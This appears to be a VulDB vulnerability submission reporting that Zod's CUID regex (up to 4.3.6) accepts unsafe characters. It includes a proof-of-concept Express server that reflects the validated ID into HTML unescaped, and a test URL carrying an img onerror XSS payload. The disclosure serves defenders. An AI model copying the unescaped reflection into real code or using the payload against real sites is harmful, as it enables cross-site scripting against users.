Submit #796749: colinhacks Zod <=4.3.6 Improper Input Validationinfo

Titlecolinhacks Zod <=4.3.6 Improper Input Validation
Description### Summary Zod provides functionality to validate data input, primarily from users, and thousands of websites rely on its validation. The CUID data type should only allow alphanumeric characters. Even though CUID is now considered obsolete and the standard recommendation is to use CUID2, Zod should still prevent unsafe characters such as `{} ' ; < >`, which can lead to XSS, SQL Injection, or Command Injection. ### Details This is the vulnerable regex line: https://github.com/colinhacks/zod/blob/c7805073fef5b6b8857307c3d4b3597a70613bc2/packages/zod/src/v4/core/regexes.ts#L3 ### PoC XSS exploiting the trust of CUID input. ```javascript const express = require('express'); const { z, ZodError } = require('zod'); const app = express(); const PORT = 3000; const CuidSchema = z.object({ id: z.cuid('The provided ID is not a valid CUID.').min(1, 'The ID parameter is required.'), }); const validateCuid = (req, res, next) => { try { const validatedData = CuidSchema.parse(req.query); req.validatedQuery = validatedData; next(); } catch (error) { if (error instanceof ZodError) { return res.status(400).json({ status: 'error', message: 'Input validation failed.', errors: error.issues.map(issue => ({ path: issue.path.join('.'), message: issue.message })) }); } return res.status(500).json({ status: 'error', message: 'Internal server error.' }); } }; app.get('/item', validateCuid, (req, res) => { const validCuid = req.validatedQuery.id; res.status(200).send(` <!DOCTYPE html> <html lang="en"> <body> <h1>Valid CUID Received</h1> <p>The provided CUID is: <strong>${validCuid}</strong></p> </body> </html> `); }); app.listen(PORT, () => { console.log(`Server running at http://localhost:${PORT}`); console.log(`Test a valid route: http://localhost:${PORT}/item?id=ck0a79p0000002p572b1v2s8v`); console.log(`Test an invalid route: http://localhost:${PORT}/item?id=c%3Cstrong%3E%3Cimg/src=%221%22onerror=alert(1)%3Ek0a79p0000002p572b1v2s8v`); }); ``` <img width="1633" height="241" alt="image" src="https://github.com/user-attachments/assets/f36c40ca-e992-4642-94b8-6810f7fe8eed" /> ### Impact Improper input validation is a critical security flaw that can lead to severe vulnerabilities like Cross-Site Scripting (XSS), SQL Injection (SQLi), and Remote Code Execution (RCE). This makes it extremely critical that input be strictly limited to alphanumeric characters whenever possible. By enforcing this restriction, you prevent malicious characters (like quotes, angle brackets, or semicolons) from being processed by the system's runtime, database, or browser, effectively mitigating these injection risks.
User
 dsonbacker (UID 46970)
Submission04/03/2026 23:54 (3 months ago)
Moderation04/24/2026 21:38 (21 days later)
StatusAccepted
VulDB entry359543 [colinhacks Zod up to 4.3.6 CUID Data Type regexes.ts sql injection]
Points17

Do you know our Splunk app?

Download it now for free!